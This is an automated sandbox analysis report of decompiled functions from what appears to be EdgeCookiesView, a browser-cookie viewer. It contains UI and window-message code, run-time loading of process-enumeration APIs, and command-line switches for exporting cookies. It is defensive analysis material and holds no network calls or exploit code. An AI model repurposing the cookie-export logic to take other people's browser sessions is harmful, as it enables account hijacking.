EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
wcscpy.MSVCRT ref: 004073B3

Strings

;t@, xrefs: 0040739E, 004073A8
H.A, xrefs: 00407336
RTL, xrefs: 00407382
strings, xrefs: 004073AD
Version, xrefs: 0040736F
TranslatorURL, xrefs: 00407359
general, xrefs: 00407331
TranslatorName, xrefs: 00407348

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2223684028
Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B813, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t69;
				void* _t75;
				void* _t97;
				signed int _t105;
				void* _t108;
				intOrPtr _t115;
				signed char _t120;
				signed int _t124;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t139;

				_t129 = __ecx;
				_t118 = _a4;
				_t139 = _t118 - 0x402;
				_v8 = __ecx;
				if(_t139 > 0) {
					_t60 = _t118 - 0x415;
					__eflags = _t60;
					if(_t60 == 0) {
						E0040A459(__ecx);
						_t132 = _t129;
						L31:
						__eflags = 0;
						E0040A1DC(0, _t118, _t132, 0);
						L32:
						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
						if(_t64 != 0 && _a4 == _t64) {
							_t127 = _a12;
							_t120 =  *(_a12 + 0xc);
							_t148 = _t120 & 0x00000008;
							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
							if((_t120 & 0x00000008) == 0) {
								__eflags = _t120 & 0x00000040;
								if((_t120 & 0x00000040) != 0) {
									 *0x412c2c =  *0x412c2c & 0x00000000;
									__eflags =  *0x412c2c;
									E004077CB(_t66);
								}
							} else {
								E0040990D(_t66, _t148, _t127);
							}
						}
						return E00401B1E(_t129, _a4, _a8, _a12);
					}
					_t69 = _t60 - 1;
					__eflags = _t69;
					if(_t69 == 0) {
						_t134 = __ecx + 0x69c;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
						_t118 =  *_t134;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
						L22:
						_t132 = _t129;
						E0040A3BF(_t129);
						goto L31;
					}
					_t75 = _t69 - 0x12;
					__eflags = _t75;
					if(__eflags == 0) {
						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
					} else {
						__eflags = _t75 - 0x41;
						if(__eflags == 0) {
							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
							E0040B00A(_t129);
						}
					}
					goto L32;
				}
				if(_t139 == 0) {
					_t38 = __ecx + 0x280;
					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
					__eflags =  *_t38;
					goto L22;
				}
				if(_t118 == 6) {
					__eflags = _a8 - 1;
					if(__eflags == 0) {
						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
					}
					goto L32;
				}
				if(_t118 == 0xc) {
					__eflags = E0040546C(_a12, L"EdgeCookiesView");
					if(__eflags == 0) {
						goto L32;
					}
					return 0;
				}
				if(_t118 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
					return 1;
				}
				if(_t118 == 0x2b) {
					_t115 = _a12;
					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					__eflags =  *(__ecx + 0x694);
					if(__eflags != 0) {
						L14:
						SetBkMode( *(_t115 + 0x18), 1);
						SetTextColor( *(_t115 + 0x18), 0xff0000);
						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t131 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
						SelectObject( *(_t131 + 0x18), _t97);
						_t129 = _v8;
						goto L32;
					}
					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
					asm("cdq");
					_t124 = 0x60;
					_t136 = _t105 * 0xe / _t124;
					_t108 =  *(__ecx + 0x694);
					__eflags = _t108;
					if(__eflags != 0) {
						DeleteObject(_t108);
						_t16 = __ecx + 0x694;
						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
						__eflags =  *_t16;
					}
					 *(_t129 + 0x694) = E004058D4(_t136);
					goto L14;
				} else {
					if(_t118 == 0x7b) {
						_t126 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
							E0040B607(__ecx, _t126);
						}
					}
					goto L32;
				}
			}

0x0040b81c
0x0040b81e
0x0040b826
0x0040b828
0x0040b82b
0x0040b9cd
0x0040b9cd
0x0040b9d2
0x0040ba34
0x0040ba39
0x0040ba3b
0x0040ba3b
0x0040ba3d
0x0040ba42
0x0040ba42
0x0040ba4a
0x0040ba51
0x0040ba54
0x0040ba57
0x0040ba5a
0x0040ba60
0x0040ba6c
0x0040ba6f
0x0040ba71
0x0040ba71
0x0040ba78
0x0040ba78
0x0040ba62
0x0040ba65
0x0040ba65
0x0040ba60
0x00000000
0x0040ba88
0x0040b9d4
0x0040b9d4
0x0040b9d5
0x0040ba17
0x0040ba21
0x0040ba24
0x0040ba2a
0x0040b9c2
0x0040b9c2
0x0040b9c4
0x00000000
0x0040b9c4
0x0040b9d7
0x0040b9d7
0x0040b9da
0x0040ba10
0x0040b9dc
0x0040b9dc
0x0040b9df
0x0040b9f9
0x0040ba03
0x0040ba03
0x0040b9df
0x00000000
0x0040b9da
0x0040b831
0x0040b9bb
0x0040b9bb
0x0040b9bb
0x00000000
0x0040b9bb
0x0040b83a
0x0040b996
0x0040b99b
0x0040b9b0
0x0040b9b0
0x00000000
0x0040b99b
0x0040b843
0x0040b985
0x0040b989
0x00000000
0x00000000
0x00000000
0x0040b98f
0x0040b84c
0x0040b94c
0x0040b952
0x00000000
0x00000000
0x0040b96a
0x00000000
0x0040b972
0x0040b855
0x0040b881
0x0040b887
0x0040b88d
0x00000000
0x00000000
0x0040b893
0x0040b89a
0x0040b8d7
0x0040b8dc
0x0040b8ea
0x0040b8ff
0x0040b908
0x0040b909
0x0040b90a
0x0040b90b
0x0040b90c
0x0040b927
0x0040b92e
0x0040b935
0x0040b93f
0x0040b941
0x00000000
0x0040b941
0x0040b8a1
0x0040b8aa
0x0040b8ad
0x0040b8b0
0x0040b8b2
0x0040b8b8
0x0040b8ba
0x0040b8bd
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8d1
0x00000000
0x0040b857
0x0040b85a
0x0040b866
0x0040b86f
0x0040b877
0x0040b877
0x0040b86f
0x00000000
0x0040b85a

APIs

GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
DeleteObject.GDI32(00000000), ref: 0040B8BD
SetBkMode.GDI32(?,00000001), ref: 0040B8DC
SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
SelectObject.GDI32(?,00000000), ref: 0040B8FF
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
SelectObject.GDI32(00000014,00000000), ref: 0040B93F

Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F

GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
LoadCursorW.USER32(00000000,00000067), ref: 0040B963
SetCursor.USER32(00000000), ref: 0040B96A
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
memcpy.MSVCRT ref: 0040B9F9

Strings

EdgeCookiesView, xrefs: 0040B978

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
String ID: EdgeCookiesView
API String ID: 1858646182-2656830938
Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA5A, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CA5A() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x413260 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryW(L"psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
					 *0x4128e8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x4128e0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
							 *0x4128d8 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x412b0c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x4128e4 = _t2;
									if(_t2 != 0) {
										 *0x413260 = 1;
									}
								}
							}
						}
					}
					if( *0x413260 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}

0x0040ca61
0x0040caf1
0x0040caf1
0x0040ca6d
0x0040ca73
0x0040ca77
0x0040caf0
0x00000000
0x0040ca79
0x0040ca86
0x0040ca8a
0x0040ca8f
0x0040ca97
0x0040ca9b
0x0040caa0
0x0040caa8
0x0040caac
0x0040cab1
0x0040cab9
0x0040cabd
0x0040cac2
0x0040caca
0x0040cace
0x0040cad3
0x0040cad5
0x0040cad5
0x0040cad3
0x0040cac2
0x0040cab1
0x0040caa0
0x0040cae7
0x0040caea
0x0040caea
0x00000000
0x0040cae7

APIs

LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
FreeLibrary.KERNEL32(00000000), ref: 0040CAEA

Strings

psapi.dll, xrefs: 0040CA68
EnumProcessModules, xrefs: 0040CA91
GetModuleInformation, xrefs: 0040CAC4
EnumProcesses, xrefs: 0040CAB3
GetModuleBaseNameW, xrefs: 0040CA80
GetModuleFileNameExW, xrefs: 0040CAA2

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2449869053-70141382
Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCAA, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040BCAA(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(L"/shtml");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sverhtml");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/sxml");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/stab");
							L0040E03E();
							if(__eax != 0) {
								_push(L"/sjson");
								L0040E03E();
								if(__eax != 0) {
									_push(L"/scomma");
									L0040E03E();
									if(__eax != 0) {
										_push(L"/scookiestxt");
										L0040E03E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 4;
										return _t5;
									}
								} else {
									_t6 = 3;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 7;
							return _t8;
						}
					} else {
						_t9 = 6;
						return _t9;
					}
				} else {
					_t10 = 5;
					return _t10;
				}
			}

0x0040bcab
0x0040bcb0
0x0040bcb9
0x0040bcc0
0x0040bcc5
0x0040bcce
0x0040bcd5
0x0040bcda
0x0040bce3
0x0040bcea
0x0040bcef
0x0040bcf8
0x0040bcff
0x0040bd04
0x0040bd0d
0x0040bd14
0x0040bd19
0x0040bd22
0x0040bd29
0x0040bd2e
0x0040bd35
0x0040bd3f
0x0040bd24
0x0040bd26
0x0040bd27
0x0040bd27
0x0040bd0f
0x0040bd11
0x0040bd12
0x0040bd12
0x0040bcfa
0x0040bcfc
0x0040bcfd
0x0040bcfd
0x0040bce5
0x0040bce7
0x0040bce8
0x0040bce8
0x0040bcd0
0x0040bcd2
0x0040bcd3
0x0040bcd3
0x0040bcbb
0x0040bcbd
0x0040bcbe
0x0040bcbe

APIs

_wcsicmp.MSVCRT ref: 0040BCB0
_wcsicmp.MSVCRT ref: 0040BCC5

Strings

/stab, xrefs: 0040BCEA
/sxml, xrefs: 0040BCD5
/sjson, xrefs: 0040BCFF
/scomma, xrefs: 0040BD14
/shtml, xrefs: 0040BCAB
/sverhtml, xrefs: 0040BCC0
/scookiestxt, xrefs: 0040BD29

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
API String ID: 2081463915-1797186745
Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x0040c9dd
0x0040ca59
0x0040ca59
0x0040c9e5
0x0040c9eb
0x0040c9ef
0x0040ca58
0x00000000
0x0040ca58
0x0040c9fe
0x0040ca02
0x0040ca07
0x0040ca0f
0x0040ca13
0x0040ca18
0x0040ca20
0x0040ca24
0x0040ca29
0x0040ca31
0x0040ca35
0x0040ca3a
0x0040ca42
0x0040ca46
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca4b
0x0040ca3a
0x0040ca29
0x0040ca18
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42

Strings

Process32First, xrefs: 0040CA2B
Process32Next, xrefs: 0040CA3C
kernel32.dll, xrefs: 0040C9E0
Module32First, xrefs: 0040CA09
Module32Next, xrefs: 0040CA1A
CreateToolhelp32Snapshot, xrefs: 0040C9F8

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004071D1, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004071D1(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E004057D1(_a4);
				if(_t3 != 0) {
					wcscpy(0x412c38, _a4);
					wcscpy(0x412e48, L"general");
					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
					asm("sbb eax, eax");
					 *0x412ecc =  ~(_t6 - 1) + 1;
					E00406D4D(0x412ed0, L"charset", 0x3f);
					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x004071d5
0x004071dd
0x004071eb
0x004071fb
0x0040720c
0x00407215
0x00407224
0x00407229
0x0040723a
0x00000000
0x00407257
0x00407258

APIs

Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

wcscpy.MSVCRT ref: 004071EB
wcscpy.MSVCRT ref: 004071FB
GetPrivateProfileIntW.KERNEL32 ref: 0040720C

Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69

Strings

H.A, xrefs: 004071F5
P/A, xrefs: 00407235
8,A, xrefs: 004071E5
rtl, xrefs: 00407206
charset, xrefs: 0040721A
TranslatorURL, xrefs: 00407244
general, xrefs: 004071F0
TranslatorName, xrefs: 00407230

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-819253090
Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5AB, Relevance: 18.1, APIs: 12, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A5AB(void* __esi) {
				struct HDWP__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				struct tagPOINT _v56;
				void* _t53;
				int _t99;
				void* _t101;

				_t101 = __esi;
				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
					GetClientRect( *(__esi + 0x208),  &_v40);
					GetWindowRect( *(__esi + 0x214),  &_v56);
					_v20 = _v44 - _v56.y + 1;
					GetWindowRect( *(__esi + 0x218),  &_v56);
					_v16 = _v40.right - _v40.left;
					_t99 = _v44 - _v56.y + 1;
					_v24 = _v40.bottom - _v40.top;
					_v12 = 0xdc;
					if( *(__esi + 0x6d4) != 0) {
						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
						_v12 = _v44 + 6;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
						_v12 = _v12 & 0x00000000;
					}
					_v8 = BeginDeferWindowPos(4);
					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t53;
			}

0x0040a5ab
0x0040a5b8
0x0040a5ca
0x0040a5e0
0x0040a5e9
0x0040a5f6
0x0040a604
0x0040a60d
0x0040a615
0x0040a618
0x0040a61f
0x0040a637
0x0040a647
0x0040a653
0x0040a653
0x0040a663
0x0040a665
0x0040a665
0x0040a67d
0x0040a68e
0x0040a6ad
0x0040a6d8
0x0040a6f0
0x00000000
0x0040a6fc
0x0040a6fe

APIs

GetClientRect.USER32 ref: 0040A5CA
GetWindowRect.USER32 ref: 0040A5E0
GetWindowRect.USER32 ref: 0040A5F6
GetDlgItem.USER32 ref: 0040A630
GetWindowRect.USER32 ref: 0040A637
MapWindowPoints.USER32 ref: 0040A647
BeginDeferWindowPos.USER32 ref: 0040A66B
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
EndDeferWindowPos.USER32(?), ref: 0040A6F5

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14

Uniqueness

Uniqueness Score: -1.00%

Function 00403899, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				void* __esi;
				struct HDWP__* _t27;
				intOrPtr* _t51;
				RECT* _t56;

				_push(__ecx);
				_t51 = __ecx;
				if(_a4 != 0x18) {
					L4:
					if(_a4 == 2) {
						KillTimer( *(_t51 + 0x10), 0x41);
					}
					if(_a4 != 0x113) {
						L11:
						if(_a4 == 5) {
							_t27 = BeginDeferWindowPos(5);
							_t56 = _t51 + 0x40;
							_v8 = _t27;
							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
							EndDeferWindowPos(_v8);
							InvalidateRect( *(_t56 + 0x10), _t56, 1);
						}
						goto L13;
					} else {
						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
							L13:
							return E004015CE(_t51, _a4, _a8, _a12);
						} else {
							 *((intOrPtr*)(_t51 + 0x78)) = 0;
							 *((intOrPtr*)( *_t51 + 4))(0);
							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
							goto L11;
						}
					}
				}
				if(_a8 == 0) {
					KillTimer( *(__ecx + 0x10), 0x41);
					goto L4;
				}
				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
				goto L13;
			}

0x0040389c
0x004038ac
0x004038ae
0x004038cf
0x004038d3
0x004038da
0x004038da
0x004038e3
0x0040392e
0x00403932
0x00403936
0x00403945
0x00403949
0x0040394c
0x0040395d
0x0040396e
0x0040397f
0x00403990
0x00403998
0x004039a4
0x004039a4
0x00000000
0x004038e5
0x004038e9
0x004039aa
0x004039be
0x0040390c
0x00403911
0x00403914
0x00403928
0x00000000
0x00403928
0x004038e9
0x004038e3
0x004038b3
0x004038cd
0x00000000
0x004038cd
0x004038bd
0x00000000

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
KillTimer.USER32(?,00000041), ref: 004038CD
KillTimer.USER32(?,00000041), ref: 004038DA
